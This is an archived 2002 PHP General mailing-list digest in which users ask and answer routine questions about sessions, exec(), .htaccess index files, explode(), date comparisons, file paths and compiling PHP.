Yeah, that's what I figured. With C++ you could find evidence that it only grabbed the used portions, but in PHP I didn't see anything to support that. Of course, like I said, the answer likely wouldn't have made a difference in anything I did, but it's nice to delve a little deeper sometimes. Thanks.

Michael

-----Original Message----- From: John Holmes [mailto:holmes072000charter.net] Sent: Tuesday, July 16, 2002 8:05 PM To: mek2600charter.net; php-generallists.php.net Subject: RE: [PHP] Newbie Question on Efficiency : Follow-up Question

---John Holmes...

-- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

attached mail follows:

The only reason a compiled language would not include a function/module/etc is to reduce the size of the final executable.

Since php doesn't store (barring the caching engines, but they work differently anyway) a compiled version, it doesn't need to worry about not including something.

Martin

-----Original Message----- From: Michael Kennedy [mailto:mek2600realitycodec.net] Sent: Wednesday, July 17, 2002 1:36 PM To: php-generallists.php.net Subject: RE: [PHP] Newbie Question on Efficiency : Follow-up Question

Michael

---John Holmes...

-- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

attached mail follows:

Exactly- I could see uses in PHP, but they're so limited that it's obvious to see why it works the way it does.

Michael Kennedy

-----Original Message----- From: Martin Towell [mailto:martin.towellworld.net] Sent: Tuesday, July 16, 2002 10:46 PM To: 'mek2600charter.net'; php-generallists.php.net Subject: RE: [PHP] Newbie Question on Efficiency : Follow-up Question

The only reason a compiled language would not include a function/module/etc is to reduce the size of the final executable.

Since php doesn't store (barring the caching engines, but they work differently anyway) a compiled version, it doesn't need to worry about not including something.

Martin

Michael

---John Holmes...

-- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

attached mail follows:

Hello ,

I am trying to call a cgi script from a PHP script and get it to return some data. I am using the script below but it does not seam to work. The cgi script (or I should say function) I am trying to call is in a perl pm file. I have include a copy of the function I am trying to call. Does anybody know what I am doing wrong.

$username= "sdfsfs"; $cmd="/usr/lib/perl5/site_perl/5.005/Email.pm::mail_virtuser_get_byuser $username"; $returndata=exec($cmd); echo $returndata;

sub mail_virtuser_get_byuser # Parses a list of aliases a user owns # Arguments: username # Return value: Array of aliases { my($username) = _; my(%virtuser) = Email::mail_virtuser_list_alias(); my($alias,$user,alii); foreach $alias (keys %virtuser) { push(alii,$alias) if ($virtuser{$alias} eq $username); } return(alii); }

-- Best regards, rdkurth mailto:rdkurth

starband.net

attached mail follows:

How about using the virtual() function?

www.php.net/virtual

---John Holmes...

> -----Original Message----- > From: rdkurthstarband.net [mailto:rdkurthstarband.net] > Sent: Tuesday, July 16, 2002 7:57 PM > To: php-general > Subject: [PHP] calling a cgi script from php > > Hello , > > I am trying to call a cgi script from a PHP script and get it to return > some data. > I am using the script below but it does not seam to work. > The cgi script (or I should say function) I am trying to call is in a > perl pm file. I have include a copy of the function I am trying to > call. Does anybody know what I am doing wrong. > > $username= "sdfsfs"; > $cmd="/usr/lib/perl5/site_perl/5.005/Email.pm::mail_virtuser_get_byuser > $username"; > $returndata=exec($cmd); > echo $returndata; > > > > > sub mail_virtuser_get_byuser > # Parses a list of aliases a user owns > # Arguments: username > # Return value: Array of aliases > { > my($username) = _; > my(%virtuser) = Email::mail_virtuser_list_alias(); > my($alias,$user,alii); > foreach $alias (keys %virtuser) { > push(alii,$alias) if ($virtuser{$alias} eq $username); > } > return(alii); > } > > -- > Best regards, > rdkurth mailto:rdkurthstarband.net > > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php

attached mail follows:

On Wednesday 17 July 2002 07:57, rdkurthstarband.net wrote: > Hello , > > I am trying to call a cgi script from a PHP script and get it to return > some data. > I am using the script below but it does not seam to work. > The cgi script (or I should say function) I am trying to call is in a > perl pm file. I have include a copy of the function I am trying to > call. Does anybody know what I am doing wrong. > > $username= "sdfsfs"; > $cmd="/usr/lib/perl5/site_perl/5.005/Email.pm::mail_virtuser_get_byuser > $username"; $returndata=exec($cmd); > echo $returndata;

What _should_ your perl script return? Also RTFM for exec().

-- Jason Wong -> Gremlins Associates -> www.gremlins.com.hk Open Source Software Systems Integrators * Web Design & Hosting * Internet & Intranet Applications Development *

/* Prediction is very difficult, especially of the future. -- Niels Bohr */

attached mail follows:

Lo all,

If I have say 20 web servers in a cluster behind something like a Cisco LocalDirector, will session data remain constant over the 20 web servers if they use a shared NFS or similar mount to save session data on?

-- me

attached mail follows:

Hi At 02:05 AM 17/07/2002 +0200, you wrote: >Lo all, > >If I have say 20 web servers in a cluster behind something like a Cisco >LocalDirector, will session data remain constant over the 20 web servers if >they use a shared NFS or similar mount to save session data on? Have a look at msession at http://www.mohawksoft.com/phoenix/ It works very well, I would not run the patch on the standard php session code as it seems to cause problems if you want to switch between session types. (at least on my setup php-4.2.1 apache linux) I have a class to manipulate msession as a user session if you need it. Tom

attached mail follows:

> >If I have say 20 web servers in a cluster behind something like a Cisco > >LocalDirector, will session data remain constant over the 20 web servers if > >they use a shared NFS or similar mount to save session data on? > Have a look at msession at http://www.mohawksoft.com/phoenix/ > It works very well, I would not run the patch on the standard php session > code as it seems to cause problems if you want to switch between session > types. (at least on my setup php-4.2.1 apache linux) > I have a class to manipulate msession as a user session if you need it.

I'll have a look at it...

I'd definitely need something that is server side however. People doing PHP code, and hosting it on these "clusters" do not even know that their sites are on clusters. The content is uploaded on servers that do not even have web servers on them, all sorts of very nifty advance stuff.

By your reply however, I take it simply using a "shared" directory for session data isn't going to work?

-- me

attached mail follows:

Howdy all.. does any one know of another place i can download a win32 ver of mcrypt other than http://mcrypt.hellug.gr/ ? as that site crashes my browser when i click any link on the page... Cheers Peter "the only dumb question is the one that wasn't asked"

attached mail follows:

ftp://mcrypt.hellug.gr/pub/crypto/mcrypt/

----- Original Message ----- From: "Peter" <phpvfsa.com.au> To: "php_gen" <php-generallists.php.net> Sent: Wednesday, July 17, 2002 1:16 AM Subject: [PHP] mcrypt

> Howdy all.. > does any one know of another place i can download a win32 ver of mcrypt other than > http://mcrypt.hellug.gr/ ? > > as that site crashes my browser when i click any link on the page... > > Cheers > > Peter > "the only dumb question is the one that wasn't asked" >

attached mail follows:

On Tue, Jul 16, 2002 at 11:08:19AM -0400, Conover, Ryan wrote: > > I am trying to do a simple fopen("http://www.weather.com/index.html", "r"); > For some reason I cannot Open any URL's after trying several. > > Warning: stat failed for Resource id #1 (errno=2 - No such file or > directory)

If you're getting a resource id, your fopen() worked fine. The failure is on some other line in your code. You need to pin down exactly which line it is.

--Dan

attached mail follows:

On Tue, Jul 16, 2002 at 01:45:01PM -0400, Michael Zornek wrote: > > I know this slight variation will make it work: > > echo "" . $db->field('name_long');

That's not an "object variable name." That's a function call. You're asking to echo "" and then echoing the value returned by the field() function in the $db object when called with the 'name_long' argument.

That's the way you have to do it.

--Dan

attached mail follows:

Sailom wrote:

> I am a novice on PHP and web programming. Can any one suggest me if I can > use index.php in place of index.html? I really need to concern about

Sure you can!

If you're using an Apache webserver, create a file named .htaccess containing the following:

DirectoryIndex index.php index.html Redirect index.html http://www.bar.net/index.php

The first line says "the directory index file is index.php, not index.html". The second line says "whenever you get a request for index.html, send them index.php instead".

> security issue too.

Umm... *what*?

-- Mark Gallagher http://cyberfuddle.com/infinitebabble/

attached mail follows:

Why not just add it to the httpd.conf, this would allow it to work within the whole server And not just one director / vhost ect.... --------------------------------------------------------------------------- Chris Kay Technical Support - Techex Communications Website: www.techex.com.au Email: chris.kaytechex.net.au Telephone: 1300 88 111 2 - Fax: (02) 9970 5788 Address: Suite 13, 5 Vuko Place, Warriewood, NSW 2102 Platinum Channel Partner of the Year - Request DSL - Broadband for Business --------------------------------------------------------------------------- > -----Original Message----- > From: Mark Gallagher [mailto:markcyberfuddle.com] > Sent: Wednesday, 17 July 2002 4:05 AM > To: Sailom > Cc: php-generallists.php.net > Subject: Re: [PHP] Using index.php instead of index.html > > > Sailom wrote: > > > I am a novice on PHP and web programming. Can any one > suggest me if > > I can use index.php in place of index.html? I really need > to concern > > about > > Sure you can! > > If you're using an Apache webserver, create a file named .htaccess > containing the following: > > DirectoryIndex index.php index.html > Redirect index.html http://www.bar.net/index.php > > The first line says "the directory index file is index.php, not > index.html". The second line says "whenever you get a request for > index.html, send them index.php instead". > > > security issue too. > > Umm... *what*? > > > > -- > Mark Gallagher > http://cyberfuddle.com/infinitebabble/ > > > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php > >

attached mail follows:

> Why not just add it to the httpd.conf, this would allow it to work within the whole server > And not just one director / vhost ect....

Maybe he doesn't have access to alter server configurations? -eg-

-- me

attached mail follows:

The only security consideration here is whether you want to advertise the fact that you're using PHP or not. If not:

DirectoryIndex index.html

AddType application/x-httpd-php .html

This is OK if most/all your pages use PHP. Otherwise, normal html gets parsed as well with unnecessary performance costs.

Security through obscurity is not a good standalone policy, but every little bit can help.

Michael

On Wed, 17 Jul 2002, Mark Gallagher wrote:

> Sailom wrote: > > > I am a novice on PHP and web programming. Can any one suggest me if I can > > use index.php in place of index.html? I really need to concern about > > Sure you can! > > If you're using an Apache webserver, create a file named .htaccess > containing the following: > > DirectoryIndex index.php index.html > Redirect index.html http://www.bar.net/index.php > > The first line says "the directory index file is index.php, not > index.html". The second line says "whenever you get a request for > index.html, send them index.php instead". > > > security issue too. > > Umm... *what*? > > > >

-- -------------------------------- n i n t i . c o m php-python-perl-mysql-postgresql -------------------------------- Michael Hall ninti

ninti.com --------------------------------

attached mail follows:

On Wednesday 17 July 2002 10:57, Michael Hall wrote: > The only security consideration here is whether you want to advertise the > fact that you're using PHP or not. If not: > > DirectoryIndex index.html > > AddType application/x-httpd-php .html

If you don't want people to know you're using PHP then you need to at least disable "expose_php" in php.ini. Also depending on your error reporting settings, any error _may_ potentially advertise the fact that you're using PHP.

-- Jason Wong -> Gremlins Associates -> www.gremlins.com.hk Open Source Software Systems Integrators * Web Design & Hosting * Internet & Intranet Applications Development *

/* Software production is assumed to be a line function, but it is run like a staff function. -- Paul Licker */

attached mail follows:

On Tue, Jul 16, 2002 at 01:57:51PM -0400, Monty wrote: > Is there a standard method in PHP for preventing multiple people from using > the same log-in username/password simultaneously on a membership site? Any > suggestions are greatly appreciated.

My session management system uses a database backend. Each hit updates a timestamp in the database, among other things. If the time of the new hit is too long since the last hit, it denies access.

Now, if a person logs in again and their User ID is in the session table, that means either their old session timed out or they're being hijacked. Either way, terminate the old session and move what they were doing into the new session.

THEN, if the person in the first session is still browsing, they'll get a message saying their session was terminated. They'll be prompted for a login. That successful login will terminate the second session.

--Dan

attached mail follows:

I agree. Using a database is usually a good way of storing session information. But as noted by Dennis below, automatic logout may require additional scripts running in the background. This is a bit inferior in PHP compared to ASP. In ASP, support for automatic session destruction is implemented by having a "magic" function (called Session_End) which will be called automagically by the web server whenever a session expires. Having this in PHP would be very nice too!

/lasso (lassolassoweb.nu)

Dennis Moore wrote: > If you do not want to use cookes and use SID or trans SID; Another method is > to track your logins via a database. This can be resource intensive > though. You need to update the database upon each click or have an empty > window refresh every 1-5 minutes. If there is no activity for 15 or 30 > minutes automatically log the person off in the database. This requires a > process to run in cron or a separate background program. The advantage of > this is that is very easy to add time based accounting to the session > management system.

attached mail follows:

I'm creating an HTML file that will be printed by my website users. I've notices that most browser have the default print margins set to 0.75". Is there any way to change the print margins to 0.25"?

--------------------------------- Do You Yahoo!? Yahoo! Autos - Get free new car price quotes

attached mail follows:

You can't change this type of setting on a client's browser The only way you'd be able to do this is to tell the user that the page prints best when margins are set to 0.25"

-----Original Message----- From: Manuel [mailto:manuelochoa-usa.com] Sent: Wednesday, July 17, 2002 10:52 AM To: PHP General Subject: [PHP] Printer margins

I'm creating an HTML file that will be printed by my website users. I've notices that most browser have the default print margins set to 0.75". Is there any way to change the print margins to 0.25"?

--------------------------------- Do You Yahoo!? Yahoo! Autos - Get free new car price quotes

attached mail follows:

We've installed and recompiled PHP but I still get "undefined function" errors when I try to use imap_open().

Does anybody have any ideas?

Thanks,

Jeff

__________________________________________________ Do You Yahoo!? Yahoo! Autos - Get free new car price quotes http://autos.yahoo.com

attached mail follows:

On Wednesday 17 July 2002 10:14, Jeff Schwartz wrote: > We've installed and recompiled PHP but I still get "undefined function" > errors when I try to use imap_open(). > > Does anybody have any ideas?

1) Have you installed the imap libraries?

2) Did you configure php to compile with imap support?

-- Jason Wong -> Gremlins Associates -> www.gremlins.com.hk Open Source Software Systems Integrators * Web Design & Hosting * Internet & Intranet Applications Development *

/* When your work speaks for itself, don't interrupt. -- Henry J. Kaiser */

attached mail follows:

The most important difference is, I believe, whether you use apxs during compilation or not.

Using ./configure --with-apxs will build a DSO module, leaving --with-apxs out will build a standalone module.

There may be more to it than that, though.

Michael

On Tue, 16 Jul 2002, Andy wrote:

> sounds logical, but what happens with my other php version, where I need the > flags? will it still be working? And where is this standalone php version > gonna be installed? > > Andy > > > "Jason Wong" <php-generalgremlins.com.hk> schrieb im Newsbeitrag > news:200207162348.35817.php-generalgremlins.com.hk... > > On Tuesday 16 July 2002 23:36, Andy wrote: > > > so how do you install a second php version?? If you compile it (besides > > > with what kind of flags) and then do a make and a make install the > original > > > version will be replaced, right? > > > > Just doing: > > > > ./configure; make; make install > > > > will compile and install the standalone php binary by default. > > > > Add whatever other options you need to the ./configure command. It's all > in > > the manual. > > > > -- > > Jason Wong -> Gremlins Associates -> www.gremlins.com.hk > > Open Source Software Systems Integrators > > * Web Design & Hosting * Internet & Intranet Applications Development * > > > > /* > > THE DAILY PLANET > > > > SUPERMAN SAVES DESSERT! > > Plans to "Eat it later" > > */ > > > > > >

-- -------------------------------- n i n t i . c o m php-python-perl-mysql-postgresql -------------------------------- Michael Hall ninti

ninti.com --------------------------------

attached mail follows:

On Wednesday 17 July 2002 04:21, Andy wrote: > sounds logical, but what happens with my other php version, where I need > the flags?

Nothing. It will stay as it is.

> will it still be working?

Yes.

> And where is this standalone php version gonna be installed?

./configure --help

to find out how to specify where to install it. Or better still, after "make" do NOT "make install". Then manually copy the php binary to wherever you want. Again this is all covered in the manual.

-- Jason Wong -> Gremlins Associates -> www.gremlins.com.hk Open Source Software Systems Integrators * Web Design & Hosting * Internet & Intranet Applications Development *

/* It is better to live rich than to die rich. -- Samuel Johnson */

attached mail follows:

Please forgive me, I am still rather new to coding in PHP. I have looked up this problem on the PHP.net site, and check my syntax, but I am just not getting it.

Here is my problem: I am working on an email page that will vaildate that there is content in the variables, and respond if there is not. Here is the code to check the variable:

If (empty ($sndrname)) { $error_report_msg = "Please provide a contact name. "; error_msg_form($error_report_msg); break 1; }

When this is run, the server returns the expected output, but adds the following below it:

Fatal error: Cannot break/continue 1 levels in /home/igraph/public_html/rhc/inforeq.php on line 82

Line 82 is the break statement. This code was working at one, time, and I changed nothing other than PHP versions. Is there is change due to the versions that I didn't find?

TIA, W. Andy Roche

attached mail follows:

Have you tried using just break? without the 1?

Jason Reid jasonachost.ca

----- Original Message ----- From: "W. Andy Roche" <andy.rocheambushsite.com> To: <php-generallists.php.net> Sent: Tuesday, July 16, 2002 10:11 PM Subject: [PHP] Break message in code.

> Please forgive me, I am still rather new to coding in PHP. I have looked up > this problem on the PHP.net site, and check my syntax, but I am just not > getting it. > > Here is my problem: > I am working on an email page that will vaildate that there is content in > the variables, and respond if there is not. Here is the code to check the > variable: > > If (empty ($sndrname)) { > $error_report_msg = "Please provide a contact name. "; > error_msg_form($error_report_msg); > break 1; > } > > When this is run, the server returns the expected output, but adds the > following below it: > > Fatal error: Cannot break/continue 1 levels in > /home/igraph/public_html/rhc/inforeq.php on line 82 > > Line 82 is the break statement. This code was working at one, time, and I > changed nothing other than PHP versions. Is there is change due to the > versions that I didn't find? > > TIA, > W. Andy Roche > > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php >

attached mail follows:

On Tue, Jul 16, 2002 at 11:11:57PM -0500, W. Andy Roche wrote: > > If (empty ($sndrname)) { > $error_report_msg = "Please provide a contact name. "; > error_msg_form($error_report_msg); > break 1; > }

Where's the while loop, for loop or case statement the break is meant to break out of? If there isn't one, break is inappropriate. Do you mean exit()?

--Dan

attached mail follows:

Hello,

I'm trying to explode an associative array element in $HTTP_POST_VARS retrieved from submitting am html form. The URL to the form is: http://www.funfry.com/form.html

Now when I try to explode $HTTP_POST_VARS["domains"] it doesn't seem to have the desired effect. I use the syntax "$site = explode(" ",$HTTP_POST_VARS["domains"]);" and instead of the expected result of:

$site[0] = "www.php.net"; $site[1] = "www.jokaroo.com"; $site[2] = "www.gnu.org";

I get: $site[0] = "www.php.net www.jokaroo.com www.gnu.org";

The value of $HTTP_POST_VARS["domains"] after submitting the form is "www.php.net www.jokaroo.com www.gnu.org". Does anyone have an idea of how I can get each domain in a seperate array index?

regards, Aleks

attached mail follows:

check that the gaps between the domains are really spaces eg: echo ord($HTTP_POST_VARS["domains"]{11});

I did this through a test script:

<? $HTTP_POST_VARS["domains"] = "www.php.net www.jokaroo.com www.gnu.org"; $site = explode(" ",$HTTP_POST_VARS["domains"]); print_r($site); exit; ?>

and got this as the output

Array ( [0] => www.php.net [1] => www.jokaroo.com [2] => www.gnu.org )

But the email program (yours or mine) might be converting the gap to spaces... (??)

-----Original Message----- From: Aleks D. [mailto:Dugonjicsympatico.ca] Sent: Wednesday, July 17, 2002 5:35 PM To: php-generallists.php.net Subject: [PHP] Bug in PHP?

Hello,

I'm trying to explode an associative array element in $HTTP_POST_VARS retrieved from submitting am html form. The URL to the form is: http://www.funfry.com/form.html

$site[0] = "www.php.net"; $site[1] = "www.jokaroo.com"; $site[2] = "www.gnu.org";

I get: $site[0] = "www.php.net www.jokaroo.com www.gnu.org";

The value of $HTTP_POST_VARS["domains"] after submitting the form is "www.php.net www.jokaroo.com www.gnu.org". Does anyone have an idea of how I can get each domain in a seperate array index?

regards, Aleks

-- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

attached mail follows:

Hi Folks:

A client of mine has a large series of high traffic, PHP/MySQL intensive websites. They're looking for dedicated hosting in Canada. Any recommendations?

Enjoy,

--Dan

attached mail follows:

Some careful testing and results...

All tests invoke the URL "http://myserver:jigsawport/phpinfo.php"

Test 1: * phpinfo.php contains exactly one line <?php phpinfo();?>

* Jigsaw's debug flag in the default extension indexer cgiframe definition for ".php" files is "true".

The browser shows a white page with the text: X-Powered-By: PHP/4.2.1 Content-type: text/html

Invoking the "view->source" menu path launches a notepad session showing exactly the same text as the browser with NO html tags.

Test 2. * phpinfo.php contains exactly one line <?php phpinfo();?>

* Jigsaw's debug flag is "false".

The browser shows an empty white page.

Invoking the "view->source" menu path launches a notepad session showing the following: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META http-equiv=Content-Type content="text/html; charset=windows-1252"></HEAD> <BODY></BODY></HTML>

Test 3. * phpinfo.php now contains some trivial container html. <html> <head><title>phpinfo page</title></head> <body> phpinfo follows... <?php phpinfo();?> </body> </html>

* Jigsaw's debug flag is "false".

The browser shows an empty white page.

The DOS prompt running Jigsaw has the process name "JAVA" until the php page is invoked. At this time it is renamed to php and stays that way. The Jigsaw server, however, does still respond to JigAdmin commands and can be stopped correctly.

Ummm????????

Murray Nicholas

-----Original Message----- From: Richard Lynch [mailto:richphpbootcamp.com] Sent: Tuesday, 16 July 2002 15:13 To: php-generallists.php.net Subject: [PHP] Re: PHP and Jigsaw

>With Jigsaw's debug facility Enabled, I get two lines on the page and the >same two lines (without html tags of any sort) in "view source" display: >X-Powered-By: PHP/4.2.1 >Content-type: text/html

If these two lines are showing up in the BROWSER, then something is pretty wrong...

They're supposed to be headers...

So something could be sending out a blank line or something before these, somehow...

If they are just showing up in debugging output, and they *ARE* headers, then PHP *IS* getting invoked, and then dying when it tries to execute your code.

Try using *JUST* this in your PHP document:

<?php phpinfo();?>

It's pretty hard to screw up something that short, so you'll know the PHP is valid :-)

And, if it works, you get a wonderfully long HTML document spewed out. It's so fun to type so little and get so much :-)

-- Like Music? http://l-i-e.com/artists.htm

-- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

attached mail follows:

On Sun, 14 Jul 2002, Simon Troup wrote: > ... quark reports things like unexpected EOF (even though when I open > the file in a text editor they have same number of lines and "look" > identical), I've also tried a few things with the Mac resource forks to > no avail. > > Has anyone tried something like this before? Does the fread() fwrite() > change line endings from mac to unix or something?

I am guessing the problem is that you're changing string lenghts and the data structure used by QuarkXPress contains string length indicators. Once you make a change to the length of a string without changing the length indicator, it gets hopelessly confused.

Frankly, I do not think this will be an easy project. The QuarkXPress data file is a pretty complex beast.

What are you actually trying to achieve? Perhaps there is another way.

miguel

attached mail follows:

I've attached a file I received with Quark 3.32, which has sample text complete with Quark Xpress tags.

Perhaps rather than using PHP to edit a whole .qxd file, perhaps you can use it to help format some text to be imported into a template file. It's not a complete solution, but a part of one -- perhaps to be used in conhjuntion with AppleScript or Macros? (I think the later quark versions have macros)...

Just to throw a complete spanner in the works, Adobe InDesign2.0 has a lot of XML capabilities, and much more integrated PDF capabilities than Quark... perhaps either an XML based solution, or a PDFLib based solution can be achieved?

Considering InDesign is about 1/3rd the price of Quark, *maybe* you might want to consider other options aside from Quark.

Justin French

on 17/07/02 4:53 PM, Miguel Cruz (mncstoic.net) wrote:

> On Sun, 14 Jul 2002, Simon Troup wrote: >> ... quark reports things like unexpected EOF (even though when I open >> the file in a text editor they have same number of lines and "look" >> identical), I've also tried a few things with the Mac resource forks to >> no avail. >> >> Has anyone tried something like this before? Does the fread() fwrite() >> change line endings from mac to unix or something? > > I am guessing the problem is that you're changing string lenghts and the > data structure used by QuarkXPress contains string length indicators. Once > you make a change to the length of a string without changing the length > indicator, it gets hopelessly confused. > > Frankly, I do not think this will be an easy project. The QuarkXPress data > file is a pretty complex beast. > > What are you actually trying to achieve? Perhaps there is another way. > > miguel >

attached mail follows:

on 17/07/02 5:28 PM, Justin French (justinindent.com.au) wrote:

> I've attached a file I received with Quark 3.32, which has sample text > complete with Quark Xpress tags.

Sorry forgot to attach the file!

Justin

DropCapParagraphStyle=<*L*h"Standard"*kn0*kt0*ra0*rb0*d(1,3)*p(0,0,0,0,0,0,g)*t(0,0," "): Ps100t0h100z12k0b0c"Black"f"Times"> DropCapParagraphStyle:<*L*h"Standard"*kn0*kt0*ra0*rb0*d(1,3)*p(0,0,0,0,0,0,g)*t(0,0," "): Ps100t0h100z12k0b0c"Black"f"Times">Si meliora dies, ut vina, poemata reddit, scire velim, chartis pretium quotus arroget annus. scriptor abhinc annos centum qui decidit, inter perfectos veteresque referri debet an inter vilis atque novos? Excludat iurgia finis, ÒEst vetus atque probus, centum qui perficit annos.Ó Quid, qui deperiit minor uno mense vel anno, inter quos referendus erit? Veteresne poetas, an quos et praesens et postera respuat aetas? BodyCopyStyle=<*L*h"Standard"*kn0*kt0*ra0*rb0*d0*p(0,12,0,0,0,0,g)*t(0,0," "): Ps100t0h100z12k0b0c"Black"f"Times"> BodyCopyStyle:ÒIste quidem veteres inter ponetur honeste, qui vel mense brevi vel toto est iunior anno.Ó Utor permisso, caudaeque pilos ut equinae paulatim vello unum, demo etiam unum, dum cadat elusus ratione ruentis acervi, qui redit in fastos et virtutem aestimat annis miraturque nihil nisi quod Libitina sacravit. Ennius et sapines et fortis et alter Homerus, ut critici dicunt, leviter curare videtur, quo promissa cadant et somnia Pythagorea. Naevius in manibus non est et mentibus haeret paene recens? Adeo sanctum est vetus omne poema. ambigitur quotiens, uter utro sit prior, aufert Pacuvius docti famam senis Accius alti, dicitur Afrani toga convenisse Menandro, Plautus ad exemplar Siculi properare Epicharmi, vincere Caecilius gravitate, Terentius arte. FloatingSubStyle=<*L*h"Standard"*kn0*kt0*ra(24,0,"Blue",100,T0,0,-4.97)*rb0*d0*p(0,0,0,0,12,0,g)*t(12,0," ",93,0," ",0,0," "): PBs50t0h100z18k0b0c"Yellow"f"Times"> FloatingSubStyle: Subhead BodyCopyStyle:Hos ediscit et hos arto stipata theatro spectat Roma potens; habet hos numeratque poetas ad nostrum tempus Livi scriptoris ab aevo. Interdum volgus rectum videt, est ubi peccat. Si veteres ita miratur laudatque poetas, ut nihil anteferat, nihil illis comparet, errat. Si quaedam nimis antique, si peraque dure dicere credit eos, ignave multa fatetur, et sapit et mecum facit et Iova iudicat aequo. Non equidem insector delendave carmina Livi esse reor, memini quae plagosum mihi parvo Orbilium dictare; sed emendata videri pulchraque et exactis minimum distantia miror. Inter quae verbum emicuit si forte decorum, et si versus paulo concinnior unus et alter, iniuste totum ducit venditque poema.

attached mail follows:

I am writing one program -

I want to display some text on web. This text should appear for limited period e.g from 20th July 12pm till 25th July 3pm. After 25th July 3pm the text should disappear from screen.

I tried to look for date comparison / string conversion to date etc, I got lot info but could not figure out which would be best for above (rather how can I do it).

Anybody can share some expert comments please ?

Thanking in advance, Manisha

attached mail follows:

On Wednesday 17 July 2002 14:55, Manisha wrote: > I am writing one program - > > I want to display some text on web. This text should appear for limited > period e.g from 20th July 12pm till 25th July 3pm. After 25th July 3pm the > text should disappear from screen. > > I tried to look for date comparison / string conversion to date etc, I got > lot info but could not figure out which would be best for above (rather how > can I do it). > > Anybody can share some expert comments please ?

1) Use strtotime() to convert your start and end dates to unixtimestamps.

2) Use time() to get the current unixtimestamp.

3) Use the standard less-than (<), greater-than (>) comparison operators on the above 3 items to decide whether or not to display the text.

-- Jason Wong -> Gremlins Associates -> www.gremlins.com.hk Open Source Software Systems Integrators * Web Design & Hosting * Internet & Intranet Applications Development *

/* A chronic disposition to inquiry deprives domestic felines of vital qualities. */

attached mail follows:

I think that it is better to use unixtimestamps and if you save them to a RDBMS then save according to GMT. When retrieving use timezone to convert to your local time - ex

define('MY_TIMEZONE',-2); list($time) = mysql_fetch_array(mysql_query('select tstamp from table where user='.$user_id.';')); $tt_ar = explode(':',gmstrftime('%H:%M:%S:%m:%d:%Y',$time)); $local_time = gmmktime($tt_ar[0]+MY_TIMEZONE, $tt_ar[1], $tt_ar[2],$tt_ar[3],$tt_ar[4],$tt_ar[5]);

Regards, Andrey

----- Original Message ----- From: "Manisha" <manishaaurica.com> To: <php-generallists.php.net> Sent: Wednesday, July 17, 2002 9:55 AM Subject: [PHP] Require some help about the date comparison

> I am writing one program - > > I want to display some text on web. This text should appear for limited > period e.g from 20th July 12pm till 25th July 3pm. After 25th July 3pm the > text should disappear from screen. > > I tried to look for date comparison / string conversion to date etc, I got > lot info but could not figure out which would be best for above (rather how > can I do it). > > Anybody can share some expert comments please ? > > Thanking in advance, > Manisha > > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php > >

attached mail follows:

> I want to display some text on web. This text should appear for limited > period e.g from 20th July 12pm till 25th July 3pm. After 25th July 3pm the > text should disappear from screen.

<? //mktime(hour,minute,second,month,day,year) $start = mktime(12,0,0,7,20,2002); $end = mktime(15,0,0,7,25,2002); $now = time();

if($now > $start && $now < $end) { //display text } else { //text expired } ?>

Something like that. You can use strtotime() instead of mktime() if you want...

---John Holmes...

attached mail follows:

Dear all I had made a test.txt file which stored in the following window path : c:\pdf_reports\dealing\test.txt, In my page, i ask php to check the test.txt exist in foler (c:\pdf_reports\dealing) using the following script:

if (file_exists("c:\\pdf_reports\\dealing\\test.txt")) { print ("exist"); } else { print ("Doesn't Exist!"); }

It seems that php can't detect the file in such path!!! I had made another test on this, i moved the test.txt to one level up which is (c:\pdf_reports) and i use the following script :

if (file_exists("c:\\pdf_reports\\test.txt")) { print ("exist"); } else { print ("Doesn't Exist!"); } Then it can detect the file is there! why?

-- Thx a lot! Jack nedcor4

nedcor.com.hk

attached mail follows:

> -----Original Message----- > From: César Aracena [mailto:icaamicaam.com.ar] > Sent: 15 July 2002 03:04

> This is what I have so far: > > for ($m=0; $m<$num_rows2; $m++) > { > $row2 = mysql_fetch_array($result2); > > echo $row2[devlanguage]; > > if ($m < $num_rows2) > { > echo ", "; > } > else > { > echo "."; > } > }

My approach to this is like this:

for ($m=0; $m<$num_rows2; $m++) { $row2 = mysql_fetch_array($result2);

if ($m>0) echo ', '; echo $row2[devlanguage]; } echo '.';

Cheers!

Mike

--------------------------------------------------------------------- Mike Ford, Electronic Information Services Adviser, Learning Support Services, Learning & Information Services, JG125, James Graham Building, Leeds Metropolitan University, Beckett Park, LEEDS, LS6 3QS, United Kingdom Email: m.fordlmu.ac.uk Tel: +44 113 283 2600 extn 4730 Fax: +44 113 283 3211

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]